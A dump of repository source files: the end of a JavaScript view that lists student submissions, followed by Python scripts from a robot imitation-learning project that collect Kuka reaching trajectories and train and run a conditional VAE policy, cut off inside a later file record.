"text": "/**Responsible for displaying what the user sees**/\nclass SeeSubmissionsStudentView extends View\n{\n\tconstructor(controller)\n\t{\n\t\tsuper();\n\n\t\tthis.title = app.viewManager.VIEW.SEE_SUBMISSIONS_STUDENT;\n\t\tthis.controller = controller;\n\t\tthis.setup();\n\t}\n\n\tonNotify (model, messageType)\n\t{\n\t\tvar view = this;\n\n\t\t// Update the table of assessments\n\t\tif (messageType === net.messageHandler.types.GET_SUBMISSIONS_SUCCESSFUL ||\n\t\t\tmessageType === net.messageHandler.types.SUBMIT_ASSIGNMENT_SUCCESSFUL)\n\t\t{\n\t\t\tvar submissionsTable = document.getElementById(\"student-submissions-table\");\n\n\t\t\t// remove all data in there.\n\t\t\tvar rowCount = submissionsTable.rows.length;\n\t\t\twhile(--rowCount)\n\t\t\t{\n\t\t\t\tsubmissionsTable.deleteRow(rowCount);\n\t\t\t}\n\n\t\t\tvar allSubmissions = model.submissions;\n\t\t\tvar submissions = [];\n\t\t\tfor (var i = 0; i < allSubmissions.length; i++)\n\t\t\t{\n\t\t\t\tif (allSubmissions[i].userID === app.user.id)\n\t\t\t\t{\n\t\t\t\t\tsubmissions.push(allSubmissions[i]);\n\t\t\t\t}\n\t\t\t}\n\n\n\n\t\t\tvar assignments = app.assignments.assignments;\n\n\t\t\tfor (var i = 0; i < submissions.length; i++)\n\t\t\t{\n\t\t\t\tvar row = submissionsTable.insertRow(i + 1);\n\n\t\t\t\tvar name = \"\";\n\n\t\t\t\tfor (var j = 0; j < assignments.length; j++)\n\t\t\t\t{\n\t\t\t\t\tif (assignments[j].id === submissions[i].assignmentID){\n\t\t\t\t\t\tname = assignments[j].name;\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tvar cell0 = row.insertCell(0);\n\t\t\t\tcell0.innerHTML = name;\n\t\t\t\tcell0.id = \"see-submission-student#\" + submissions[i].id;\n\t\t\t\tcell0.addEventListener(\"click\", function()\n\t\t\t\t{\n\t\t\t\t\tapp.submissions.codeViewState = \"Clear\";\n\t\t\t\t\tapp.submissions.submissionIDToCodeView = parseInt(this.id.split('#')[1]);\n\t\t\t\t\tapp.submissions.reviewerIDToCodeView = -1;\n\n\t\t\t\t\tapp.viewManager.goToView(app.viewManager.VIEW.CODE_VIEW);\n\t\t\t\t});\n\t\t\t}\n\t\t}\n\t}\n\n\n\tshow()\n\t{\n\t\tsuper.show();\n\t}\n}\n"
}
] | 41 |
msieb1/stochastic-IL | https://github.com/msieb1/stochastic-IL | e8cfc3aedaa56b03d88b216a8eb7a9a31515c22a | 1750a2e97b47b1b322b147410a7c5552f95eba06 | 225622d8189295eef9e350e0cd250ae3029544df | refs/heads/master | 2020-04-01T18:13:53.094405 | 2018-10-18T14:48:56 | 2018-10-18T14:48:56 | 153,480,134 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5707070827484131,
"alphanum_fraction": 0.6025640964508057,
"avg_line_length": 35.771427154541016,
"blob_id": "b3d12be83dc063c95fc9c3a95005601c119a1b9b",
"content_id": "1460b6a1e279408147a1f68903ca982a3d648be5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5148,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 140,
"path": "/files/run_inference.py",
"repo_name": "msieb1/stochastic-IL",
"src_encoding": "UTF-8",
"text": "#add parent dir to find package. Only needed for source code build, pip install doesn't need it.\nimport os, inspect\nfrom kukaGymEnvReach import KukaGymEnvReach as KukaGymEnv\nimport time\n\nfrom numpy import array\nimport numpy as np\nfrom copy import deepcopy as copy\nfrom numpy.random import uniform as uf\n\nfrom pdb import set_trace\nimport pickle\nfrom os.path import join\nfrom numpy import concatenate as cat\nimport argparse\nimport torch\nimport sys\n\nsys.path.append('../models')\nfrom networks import VAE\n\nnp.set_printoptions(precision=4)\n\nxlow = 0.4\nxhigh = 0.7\nylow = -0.2\nyhigh = 0.2\nzlow = 0.3\nzhigh = 0.6\n\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--task', dest='task', type=str, default='reach')\nparser.add_argument(\"--batch_size\", type=int, default=16)\nparser.add_argument(\"--learning_rate\", type=float, default=0.001)\nparser.add_argument(\"--encoder_layer_sizes\", type=list, default=[3, 256])\nparser.add_argument(\"--decoder_layer_sizes\", type=list, default=[256, 3])\nparser.add_argument(\"--latent_size\", type=int, default=10)\nparser.add_argument('-e', '--expname', type=str, required=True)\n\nargs = parser.parse_args()\n\nEXP_PATH = '../experiments/{}'.format(args.expname)\nSAVE_PATH = join(EXP_PATH, 'data')\nMODEL_PATH = join(EXP_PATH, 'trained_weights')\n\nUSE_CUDA = True\nEPOCH=23\nmodel = VAE(encoder_layer_sizes=args.encoder_layer_sizes, latent_size=args.latent_size, decoder_layer_sizes=args.decoder_layer_sizes, conditional=True, num_labels=6)\nmodel.load_state_dict(torch.load(join(MODEL_PATH, 'epoch_{}.pk'.format(EPOCH)), map_location=lambda storage, loc: storage))\nif USE_CUDA:\n model = model.cuda()\n\ndef normalize(a):\n return a/np.linalg.norm(a)\n\ndef save_trajectory(file, savepath, seqname=None):\n if seqname is not None:\n seqname = seqname\n else:\n # If there's no video directory, this is the first sequence.\n if not os.listdir(savepath):\n seqname = '0'\n else:\n # Otherwise, get the latest sequence name and increment it.\n seq_names = [int(i.split('.')[0]) for i in os.listdir(savepath)]\n latest_seq = sorted(map(int, seq_names), reverse=True)[0]\n seqname = str(latest_seq+1)\n print('No seqname specified, using: %s' % seqname)\n with open(join(savepath, '{0:05d}_{1}}.pkl'.format(int(seqname), args.runname)), 'wb') as f:\n pickle.dump(file, f)\n\n\ndef main():\n env = KukaGymEnv(renders=True,isDiscrete=False, maxSteps = 10000000)\n motorsIds=[]\n\n all_trajectories = []\n n = 0\n while True:\n done = False\n # Reset z to 0,2 higher than intended because it adds +0.2 internally (possibly finger?)\n start = np.array([uf(xlow+0.05, xhigh-0.05), uf(ylow+0.05, yhigh-0.07), uf(zlow+0.05,zhigh-0.05)])\n goal = np.array([uf(xlow+0.05, xhigh-0.05), uf(ylow+0.05, yhigh-0.07), uf(zlow+0.05,zhigh-0.05)])\n state, success = np.array(env._reset_positions(start)) #default [-0.100000,0.000000,0.070000]\n action = normalize(goal - state[:3])*0.001\n eps = 0.01\n action = action.tolist()\n action += [0,0]\n if not success:\n env._reset()\n continue\n # print('diff goal - start: {}'.format(goal - state[:3]))\n # print('start state: {}, goal state: {}'.format(state[:3], goal))\n # print('true state: {}'.format(env._get_link_state()[0]))\n\n # print('normed action: {}'.format((goal - state[:3])/np.linalg.norm(state[:3]- goal)))\n # print('action: {}'.format(action[:3]))\n ii = 0\n\n trajectory = {'action': [], 'state_aug': [], 'next_state_aug': []}\n while (not done):\n action[:3] = normalize(goal - state[:3])*0.005\n\n state_old = copy(state)\n state_old_aug = cat([state[:3], goal])\n\n cur_state = torch.Tensor(state_old_aug).cuda()\n action = model.inference(n=1, k=cur_state.unsqueeze_(0)) \n\n # reshape, detach data, move to cpu, and convert to numpy \n action = action.view(-1,).detach().cpu().numpy() / 100 # * 100 during training for normalizing\n action = cat([action, np.zeros(2,)])\n state, reward, done, info = env.step2(action)\n state = np.array(state)\n obs = env.getExtendedObservation()\n if ii % 1 == 0:\n # # print('normed executed action: {}'.format((state[:3] - state_old[:3])/np.linalg.norm(state[:3] - state_old[:3])))\n # # print('executed action:{}'.format(state[:3] - state_old[:3]))\n print(\"\\n\")\n print('current state: {}'.format(state[:3]))\n print('goal state: {}'.format(goal))\n print('action: {}'.format(action[:3]))\n # pass\n ii += 1\n\n time.sleep(0.01)\n # set_trace()\n trajectory['action'].append(action)\n trajectory['state_aug'].append(state_old_aug)\n trajectory['next_state_aug'].append(cat([state[:3], goal]))\n if np.linalg.norm(goal - state[:3]) < eps:\n done = True\n if ii > 200:\n break\n\n\nif __name__==\"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.4900497496128082,
"alphanum_fraction": 0.5292654633522034,
"avg_line_length": 39.922157287597656,
"blob_id": "52178f3b4b4a20da0e3733a9f563f7b1beeb2659",
"content_id": "564edc0de048491884ef7e644e27052df8a52801",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6834,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 167,
"path": "/files/collect_data_multimodal.py",
"repo_name": "msieb1/stochastic-IL",
"src_encoding": "UTF-8",
"text": "#add parent dir to find package. Only needed for source code build, pip install doesn't need it.\nimport os, inspect\nfrom kukaGymEnvReach import KukaGymEnvReach as KukaGymEnv\nimport time\n\nfrom numpy import array\nimport numpy as np\nfrom copy import deepcopy as copy\nfrom numpy.random import uniform as uf\n\nfrom pdb import set_trace\nimport pickle\nfrom os.path import join\nfrom numpy import concatenate as cat\nimport argparse\nimport matplotlib.pyplot as plt\nnp.set_printoptions(precision=4)\n\nxlow = 0.4\nxhigh = 0.7\nylow = -0.2\nyhigh = 0.2\nzlow = 0.3\nzhigh = 0.6\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-e', '--expname', type=str, required=True)\nparser.add_argument('-r', '--runname', type=str, required=True)\nargs = parser.parse_args()\n\nBASE_DIR = '/'.join(os.path.realpath(__file__).split('/')[:-3])\nEXP_PATH = join(BASE_DIR, 'experiments/{}'.format(args.expname))\nSAVE_PATH = join(EXP_PATH, 'data')\nMODEL_PATH = join(EXP_PATH, 'trained_weights')\n\nif not os.path.exists(SAVE_PATH):\n os.makedirs(SAVE_PATH)\n\ndef normalize(a):\n return a/np.linalg.norm(a)\n\ndef save_trajectory(file, savepath, seqname=None):\n if seqname is not None:\n seqname = seqname\n else:\n # If there's no video directory, this is the first sequence.\n if not os.listdir(savepath):\n seqname = '0'\n else:\n # Otherwise, get the latest sequence name and increment it.\n seq_names = [int(i.split('.')[0][:5]) for i in os.listdir(savepath)]\n latest_seq = sorted(map(int, seq_names), reverse=True)[0]\n seqname = str(latest_seq+1)\n print('No seqname specified, using: %s' % seqname)\n with open(join(savepath, '{0:05d}_{1}.pkl'.format(int(seqname), args.runname)), 'wb') as f:\n pickle.dump(file, f)\n\ndef main():\n env = KukaGymEnv(renders=True,isDiscrete=False, maxSteps = 10000000)\n \n try: \n motorsIds=[]\n #motorsIds.append(env._p.addUserDebugParameter(\"posX\",0.4,0.75,0.537))\n #motorsIds.append(env._p.addUserDebugParameter(\"posY\",-.22,.3,0.0))\n #motorsIds.append(env._p.addUserDebugParameter(\"posZ\",0.1,1,0.2))\n #motorsIds.append(env._p.addUserDebugParameter(\"yaw\",-3.14,3.14,0))\n #motorsIds.append(env._p.addUserDebugParameter(\"fingerAngle\",0,0.3,.3))\n \n dv = 0.00\n all_trajectories = []\n n = 0\n while True:\n done = False\n # Reset z to 0,2 higher than intended because it adds +0.2 internally (possibly finger?)\n # start = np.array([uf(xlow+0.03, xhigh-0.03), uf(ylow+0.03, yhigh-0.03), uf(zlow+0.03,zhigh-0.03)])\n # goal = np.array([uf(xlow+0.03, xhigh-0.03), uf(ylow+0.03, yhigh-0.03), uf(zlow+0.03,zhigh-0.03)])\n\n # start = np.array([uf(xlow+0.03, xlow+0.034), uf(ylow+0.1, ylow+0.15), uf(zlow+0.03,zlow+0.035)])\n start = np.array([xlow+0.032, uf(ylow+0.1, ylow+0.15), uf(zlow+0.03,zlow+0.035)])\n if start[1] < ylow+0.125:\n y_offset = -uf(0.08,0.12)\n else:\n y_offset = uf(0.08,0.12)\n goal = np.array([start[0]+ 0.15, start[1], start[2]-0.2])\n # switching_point_fraction = 1/uf(3.5,4.5)\n switching_point_fraction = 0.25\n state_, success = np.array(env._reset_positions(start)) #default [-0.100000,0.000000,0.070000]\n state = state_[:3]\n true_start_state = copy(state)\n action = normalize(goal - state)*0.001\n eps = 0.01\n action = action.tolist()\n action += [0,0]\n if not success:\n env._reset()\n continue\n # print('diff goal - start: {}'.format(goal - state))\n # print('start state: {}, goal state: {}'.format(state, goal))\n # print('true state: {}'.format(env._get_link_state()[0]))\n\n # print('normed action: {}'.format((goal - state)/np.linalg.norm(state- goal)))\n # print('action: {}'.format(action[:3]))\n ii = 0\n\n trajectory = {'action': [], 'state_aug': [], 'next_state_aug': []}\n while (not done):\n # print('state x: {}'.format(state[0]))\n if state[0] < true_start_state[0] + (goal[0] - true_start_state[0]) * switching_point_fraction:\n wp_goal = copy(goal)\n wp_goal[0] = true_start_state[0] +(true_start_state[0]+goal[0])/4.0\n elif state[0] < true_start_state[0] + (goal[0] - true_start_state[0]) * 2.0/3.0:\n # print('branched off')\n\n wp_goal = copy(goal)\n wp_goal[0] = true_start_state[0] + (goal[0] - true_start_state[0]) * 2.0/3.0\n wp_goal[1] = true_start_state[1] + y_offset\n \n else:\n # print('branch back in')\n wp_goal = copy(goal)\n \n action[:3] = normalize(wp_goal - state)*0.005\n\n state_old = copy(state)\n state_old_aug = cat([state, goal])\n state_, reward, done, info = env.step2(action)\n state = state_[:3]\n state = np.array(state)\n #obs = env.getExtendedObservation()\n if ii % 1 == 0:\n # print('normed executed action: {}'.format((state - state_old[:3])/np.linalg.norm(state - state_old[:3])))\n # print('executed action:{}'.format(state - state_old[:3]))\n # print(\"\\n\")\n print('current state: {}'.format(state))\n print('goal state: {}'.format(goal))\n print('action: {}'.format(action[:3]))\n pass\n ii += 1\n\n time.sleep(0.01)\n # set_trace()\n trajectory['action'].append(action)\n trajectory['state_aug'].append(state_old_aug)\n trajectory['next_state_aug'].append(cat([state, goal]))\n if np.linalg.norm(goal - state) < eps:\n done = True\n if ii >= 1000:\n break\n if done:\n all_trajectories.append(trajectory)\n\n if n % 10 == 0:\n print(\"collected {} trajectories\".format(n+1))\n\n if n % 50 == 0:\n print(\"save trajectories\")\n save_trajectory(all_trajectories, SAVE_PATH, 'newest_backup')\n if n % 50 == 0:\n print(\"save trajectories\")\n save_trajectory(all_trajectories, SAVE_PATH, 'newest')\n n += 1\n except KeyboardInterrupt:\n pass\n # save_trajectory(all_trajectories, SAVE_PATH)\n\nif __name__==\"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5699442028999329,
"alphanum_fraction": 0.6009235978126526,
"avg_line_length": 38.07518768310547,
"blob_id": "66131b128db861fb6cb82b0aba0a95b1242d3cb6",
"content_id": "2e45e11b1f39853511a2f79822dd36825d62b949",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5197,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 133,
"path": "/files/run_inference_multimodal.py",
"repo_name": "msieb1/stochastic-IL",
"src_encoding": "UTF-8",
"text": "#add parent dir to find package. Only needed for source code build, pip install doesn't need it.\nimport os, inspect\nfrom kukaGymEnvReach import KukaGymEnvReach as KukaGymEnv\nimport time\n\nfrom numpy import array\nimport numpy as np\nfrom copy import deepcopy as copy\nfrom numpy.random import uniform as uf\n\nfrom pdb import set_trace\nimport pickle\nfrom os.path import join\nfrom numpy import concatenate as cat\nimport argparse\nimport torch\nimport sys\nBASE_DIR = '/'.join(os.path.realpath(__file__).split('/')[:-2])\nsys.path.append(join(BASE_DIR, 'models'))\nfrom networks import VAE\n\nnp.set_printoptions(precision=4)\n\nxlow = 0.4\nxhigh = 0.7\nylow = -0.2\nyhigh = 0.2\nzlow = 0.3\nzhigh = 0.6\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--task', dest='task', type=str, default='reach')\nparser.add_argument(\"--batch_size\", type=int, default=16)\nparser.add_argument(\"--learning_rate\", type=float, default=0.001)\nparser.add_argument(\"--encoder_layer_sizes\", type=list, default=[3, 128,256])\nparser.add_argument(\"--decoder_layer_sizes\", type=list, default=[256,128, 3])\nparser.add_argument(\"--latent_size\", type=int, default=30)\nparser.add_argument('-c', \"--ckpt_epoch_num\", type=int, default=31)\nparser.add_argument(\"-cu\", \"--cuda_visible_devices\",type=str, default=\"1,2\")\nparser.add_argument('-e', '--expname', type=str, required=True)\n\nargs = parser.parse_args()\n\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=args.cuda_visible_devices\n\nEXP_PATH = join(BASE_DIR, 'experiments/{}'.format(args.expname))\nSAVE_PATH = join(EXP_PATH, 'data')\nMODEL_PATH = join(EXP_PATH, 'trained_weights')\n\nUSE_CUDA = True\nEPOCH=args.ckpt_epoch_num\nmodel = VAE(encoder_layer_sizes=args.encoder_layer_sizes, latent_size=args.latent_size, decoder_layer_sizes=args.decoder_layer_sizes, conditional=True, num_labels=6)\nmodel.load_state_dict(torch.load(join(MODEL_PATH, 'epoch_{}.pk'.format(EPOCH)), map_location=lambda storage, loc: storage))\n\nif USE_CUDA:\n model = model.cuda()\ndef normalize(a):\n return a/np.linalg.norm(a)\n\ndef main():\n env = KukaGymEnv(renders=True,isDiscrete=False, maxSteps = 10000000)\n motorsIds=[]\n\n all_trajectories = []\n n = 0\n while True:\n done = False\n # Reset z to 0,2 higher than intended because it adds +0.2 internally (possibly finger?)\n start = np.array([uf(xlow+0.03, xlow+0.034), uf(ylow+0.1, ylow+0.15), uf(zlow+0.03,zlow+0.035)])\n goal = np.array([start[0]+ 0.15, start[1], start[2]-0.2])\n state_, success = np.array(env._reset_positions(start)) #default [-0.100000,0.000000,0.070000]\n state = state_[:3]\n\n action = normalize(goal - state)*0.001\n eps = 0.01\n action = action.tolist()\n action += [0,0]\n if not success:\n env._reset()\n continue\n # print('diff goal - start: {}'.format(goal - state))\n # print('start state: {}, goal state: {}'.format(state, goal))\n # print('true state: {}'.format(env._get_link_state()[0]))\n\n # print('normed action: {}'.format((goal - state)/np.linalg.norm(state- goal)))\n # print('action: {}'.format(action[:3]))\n ii = 0\n\n trajectory = {'action': [], 'state_aug': [], 'next_state_aug': []}\n while (not done):\n action[:3] = normalize(goal - state)*0.005\n\n state_old = copy(state)\n state_old_aug = cat([state, goal])\n\n cur_state = torch.Tensor(state_old_aug).cuda().unsqueeze_(0)\n action = model.inference(n=1, k=cur_state) \n action = action.view(-1,).detach().cpu().numpy() / 100 # * 100 during training for normalizing\n # reshape, detach data, move to cpu, and convert to numpy \n action = cat([action, np.zeros(2,)])\n state_, reward, done, info = env.step2(action)\n state = np.array(state)\n state = state_[:3]\n #obs = env.getExtendedObservation()\n if ii % 10 == 0:\n # # print('normed executed action: {}'.format((state - state_old[:3])/np.linalg.norm(state - state_old[:3])))\n # # print('executed action:{}'.format(state - state_old[:3]))\n samples = []\n for s in range(100):\n action = model.inference(n=1, k=cur_state) \n action = action.view(-1,).detach().cpu().numpy() / 100 # * 100 during training for normalizing\n samples.append(action)\n print(\"variance in action selection: {}\".format(np.std(samples, axis=0)))\n print(\"\\n\")\n print('current state: {}'.format(state))\n print('goal state: {}'.format(goal))\n print('action: {}'.format(action[:3]))\n # pass\n ii += 1\n\n time.sleep(0.01)\n # set_trace()\n trajectory['action'].append(action)\n trajectory['state_aug'].append(state_old_aug)\n trajectory['next_state_aug'].append(cat([state, goal]))\n if np.linalg.norm(goal - state) < eps:\n done = True\n if ii > 200:\n break\n\nif __name__==\"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5751549601554871,
"alphanum_fraction": 0.5829029083251953,
"avg_line_length": 32.956138610839844,
"blob_id": "3913fd68e6b44fb6a0a9c779d5871bd5b5182be8",
"content_id": "b69efb33a43e1496441e482d56fe5157a593dc73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3872,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 114,
"path": "/models/networks.py",
"repo_name": "msieb1/stochastic-IL",
"src_encoding": "UTF-8",
"text": "import time\nimport argparse\nimport sys\nimport numpy as np\nimport os\nfrom PIL import Image\nfrom pdb import set_trace\nimport torch\nimport torch.nn as nn\n\n\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152\nos.environ[\"CUDA_VISIBLE_DEVICES\"]= \"1,2\"\n\n\ndef to_var(x, device, volatile=False):\n x = torch.Tensor(x)\n x = x.to(device)\n return x\n\nclass VAE(nn.Module):\n\n def __init__(self, encoder_layer_sizes, latent_size, decoder_layer_sizes, conditional=False, num_labels=0):\n super(VAE, self).__init__()\n if conditional:\n assert num_labels > 0\n assert type(encoder_layer_sizes) == list\n assert type(latent_size) == int\n assert type(decoder_layer_sizes) == list\n\n self.latent_size = latent_size\n self.encoder = Encoder(encoder_layer_sizes, latent_size, conditional, num_labels)\n self.decoder = Decoder(decoder_layer_sizes, latent_size, conditional, num_labels)\n\n def forward(self, x, k=None):\n batch_size = x.size(0)\n means, log_var = self.encoder(x, k)\n std = torch.exp(0.5 * log_var).cuda()\n # eps = to_var(torch.randn([batch_size, self.latent_size]))\n eps = torch.randn([batch_size, self.latent_size]).cuda()\n z = eps * std + means\n recon_x = self.decoder(z, k)\n return recon_x, means, log_var, z\n\n def inference(self, use_cuda=True, n=1, k=None):\n batch_size = n\n # z = to_var(torch.randn([batch_size, self.latent_size]))\n if use_cuda:\n z = torch.randn([batch_size, self.latent_size]).cuda()\n else:\n z = torch.randn([batch_size, self.latent_size])\n recon_x = self.decoder(z, k)\n return recon_x\n\nclass Encoder(nn.Module):\n\n def __init__(self, layer_sizes, latent_size, conditional, num_labels):\n super(Encoder, self).__init__()\n\n self.conditional = conditional\n if self.conditional:\n layer_sizes[0] += num_labels\n\n self.MLP = nn.Sequential()\n for i, (in_size, out_size) in enumerate( zip(layer_sizes[:-1], layer_sizes[1:]) ):\n self.MLP.add_module(name=\"L%i\"%(i), module=nn.Linear(in_size, out_size))\n self.MLP.add_module(name=\"A%i\"%(i), module=nn.ReLU())\n\n self.linear_means = nn.Linear(layer_sizes[-1], latent_size)\n self.linear_log_var = nn.Linear(layer_sizes[-1], latent_size)\n\n def forward(self, x, k=None):\n if self.conditional:\n # c = idx2onehot(c, n=10)\n \n x = torch.cat((x, k), dim=1)\n\n x = self.MLP(x)\n means = self.linear_means(x)\n log_vars = self.linear_log_var(x)\n return means, log_vars\n\nclass Decoder(nn.Module):\n\n def __init__(self, layer_sizes, latent_size, conditional, num_labels):\n super(Decoder, self).__init__()\n\n self.MLP = nn.Sequential()\n self.conditional = conditional\n if self.conditional:\n input_size = latent_size + num_labels\n else:\n input_size = latent_size\n\n for i, (in_size, out_size) in enumerate( zip([input_size]+layer_sizes[:-1], layer_sizes)):\n self.MLP.add_module(name=\"L%i\"%(i), module=nn.Linear(in_size, out_size))\n if i+1 < len(layer_sizes):\n self.MLP.add_module(name=\"A%i\"%(i), module=nn.ReLU())\n else:\n # self.MLP.add_module(name=\"sigmoid\", module=nn.Sigmoid())\n self.MLP.add_module(name=\"tanh\", module=nn.Tanh())\n\n def forward(self, z, k):\n if self.conditional:\n # c = idx2onehot(c, n=10)\n z = torch.cat((z, k), dim=1)\n\n x = self.MLP(z)\n return x\n\ndef vae_loss_fn(recon_x, x, mean, log_var):\n BCE = torch.nn.functional.binary_cross_entropy(recon_x, x, size_average=False)\n KLD = -0.5 * torch.sum(1 + log_var - mean.pow(2) - log_var.exp())\n return BCE + KLD\n\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.75,
"avg_line_length": 15,
"blob_id": "939a50cfcf7ea6d82691edf680fcc8baf9401f7f",
"content_id": "9ef5e25d62fc889121ddf7fe1d80dafde137b19a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 16,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 1,
"path": "/README.md",
"repo_name": "msieb1/stochastic-IL",
"src_encoding": "UTF-8",
"text": "# stochastic-IL\n"
},
{
"alpha_fraction": 0.5905143618583679,
"alphanum_fraction": 0.6060454249382019,
"avg_line_length": 34.64285659790039,
"blob_id": "20c0800c3939a95276bcc5f0a1c6e272e50eedbb",
"content_id": "cf52d9ed674596dc7267df2bb8b0cc3f2ea852cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5988,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 168,
"path": "/models/train.py",
"repo_name": "msieb1/stochastic-IL",
"src_encoding": "UTF-8",
"text": "import os\nimport time\nimport torch\nimport argparse\nimport numpy as np\nimport pandas as pd\n# import seaborn as sns\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom torchvision import transforms\nfrom torchvision.datasets import MNIST\nfrom torch.utils.data import DataLoader, TensorDataset\nfrom collections import OrderedDict, defaultdict\nfrom os.path import join\nimport os\nimport pickle\nimport random\nfrom ipdb import set_trace\nfrom networks import VAE\nimport argparse\nfrom os.path import join\nimport matplotlib.pyplot as plt\nfrom copy import deepcopy as copy\nfrom logger import Logger\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--epochs\", type=int, default=40)\nparser.add_argument(\"--batch_size\", type=int, default=32)\nparser.add_argument(\"--learning_rate\", type=float, default=0.001)\nparser.add_argument(\"--encoder_layer_sizes\", type=list, default=[3, 128,256])\nparser.add_argument(\"--decoder_layer_sizes\", type=list, default=[256, 128, 3])\nparser.add_argument(\"--latent_size\", type=int, default=30)\nparser.add_argument(\"--print_every\", type=int, default=100)\nparser.add_argument(\"--fig_root\", type=str, default='figs')\nparser.add_argument(\"--conditional\",type=bool, default=True)\nparser.add_argument(\"-cu\", \"--cuda_visible_devices\",type=str, default=\"1,2\")\nparser.add_argument('-e', '--expname', type=str, required=True)\nargs = parser.parse_args()\n\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=args.cuda_visible_devices\n\nBASE_DIR = '/'.join(os.path.realpath(__file__).split('/')[:-2])\nEXP_PATH = join(BASE_DIR, 'experiments/{}'.format(args.expname))\nSAVE_PATH = join(EXP_PATH, 'data')\nMODEL_PATH = join(EXP_PATH, 'trained_weights')\nif not os.path.exists(MODEL_PATH):\n os.makedirs(MODEL_PATH)\nLOG_PATH = join('tb', args.expname)\nif not os.path.exists(LOG_PATH):\n os.makedirs(LOG_PATH)\n\nPKL_FILES = [i for i in os.listdir(SAVE_PATH) if i.startswith('newest')]\n\nUSE_CUDA = True\n\ndef to_var(x, use_cuda=True, volatile=False):\n x = torch.Tensor(x)\n if use_cuda:\n x = x.cuda()\n return x\n\ndef main():\n\n ts = time.time()\n\n datasets = OrderedDict()\n\n train_set_x = []\n train_trajectories = []\n train_set_y = []\n val_set_x = []\n val_set_y = []\n for file in PKL_FILES:\n with open(join(SAVE_PATH, file), 'rb') as f:\n loaded_trajectory = pickle.load(f) \n for state_tuple in loaded_trajectory: \n train_set_x.extend(state_tuple['action'])\n train_set_y.extend(state_tuple['state_aug'])\n print len(train_set_x)\n \n num_val = int(len(train_set_x) * 0.2)\n num_train = len(train_set_x) - num_val\n val_set_x = train_set_x[num_train : ]\n val_set_y = train_set_y[num_train : ]\n train_set_x = train_set_x[: num_train]\n train_set_y = train_set_y[: num_train]\n\n # Visualize trajectories in 2d:\n fig = plt.figure()\n # ax = fig.add_subplot(111, projection='3d') \n ind = np.random.choice(len(train_set_y), min(len(train_set_y), 5000), replace=False) \n for ii, pt in enumerate(np.array(train_set_y)[ind]):\n plt.scatter(pt[0], pt[1], s=0.2,c='b')\n plt.savefig(os.path.join(EXP_PATH, '{}_traj_plot.pdf'.format(args.expname)))\n # plt.show()\n # set_trace()\n # return\n\n datasets['train'] = TensorDataset(torch.Tensor(train_set_x), torch.Tensor(train_set_y))\n datasets['val'] = TensorDataset(torch.Tensor(val_set_x), torch.Tensor(val_set_y))\n logger = Logger(LOG_PATH)\n\n def loss_fn(recon_x, x, mean, log_var):\n #BCE = torch.nn.functional.binary_cross_entropy(recon_x, x, size_average=False)\n BCE = criterion(recon_x, x)\n KLD = -0.5 * torch.sum(1 + log_var - mean.pow(2) - log_var.exp())\n\n return BCE + KLD\n criterion = torch.nn.MSELoss()\n vae = VAE(\n encoder_layer_sizes=args.encoder_layer_sizes,\n latent_size=args.latent_size,\n decoder_layer_sizes=args.decoder_layer_sizes,\n conditional=args.conditional,\n num_labels= 6 if args.conditional else 0\n )\n if USE_CUDA:\n vae = vae.cuda()\n\n optimizer = torch.optim.SGD(vae.parameters(), lr=args.learning_rate, momentum=0.9)\n tot_iteration = 0\n for epoch in range(args.epochs):\n\n tracker_epoch = defaultdict(lambda: defaultdict(dict))\n print('-'*10)\n print(\"Epoch: {}\".format(epoch + 1))\n for split, dataset in datasets.items():\n if split == 'val':\n print('validation:')\n data_loader = DataLoader(dataset=dataset, batch_size=args.batch_size, shuffle=split=='train')\n for iteration, (x, y) in enumerate(data_loader):\n\n # set_trace()\n x = to_var(x)[:, :3] * 100\n y = to_var(y)\n\n x = x.view(-1, 3)\n y = y.view(-1, 6)\n\n if args.conditional:\n recon_x, mean, log_var, z = vae(x, y)\n else:\n recon_x, mean, log_var, z = vae(x)\n\n loss = loss_fn(recon_x, x, mean, log_var)\n\n if split == 'train':\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if tot_iteration % 100 == 0:\n logger.scalar_summary('train_loss', loss.data.item(), tot_iteration)\n else:\n if tot_iteration % 100 == 0:\n logger.scalar_summary('val_loss', loss.data.item(), tot_iteration)\n\n if iteration % args.print_every == 100 or iteration == len(data_loader)-1:\n print(\"Batch {0:04d}/{1} Loss {2:9.4f}\".format(iteration, len(data_loader)-1, loss.data.item()))\n tot_iteration += 1\n\n if epoch and epoch % 5 == 0:\n torch.save(vae.state_dict(), join(MODEL_PATH, 'epoch_{}.pk'.format(epoch)))\n print(\"saving weights...\")\n\nif __name__ == '__main__':\n\n main()\n"
},
{
"alpha_fraction": 0.616797924041748,
"alphanum_fraction": 0.6543508768081665,
"avg_line_length": 32.693878173828125,
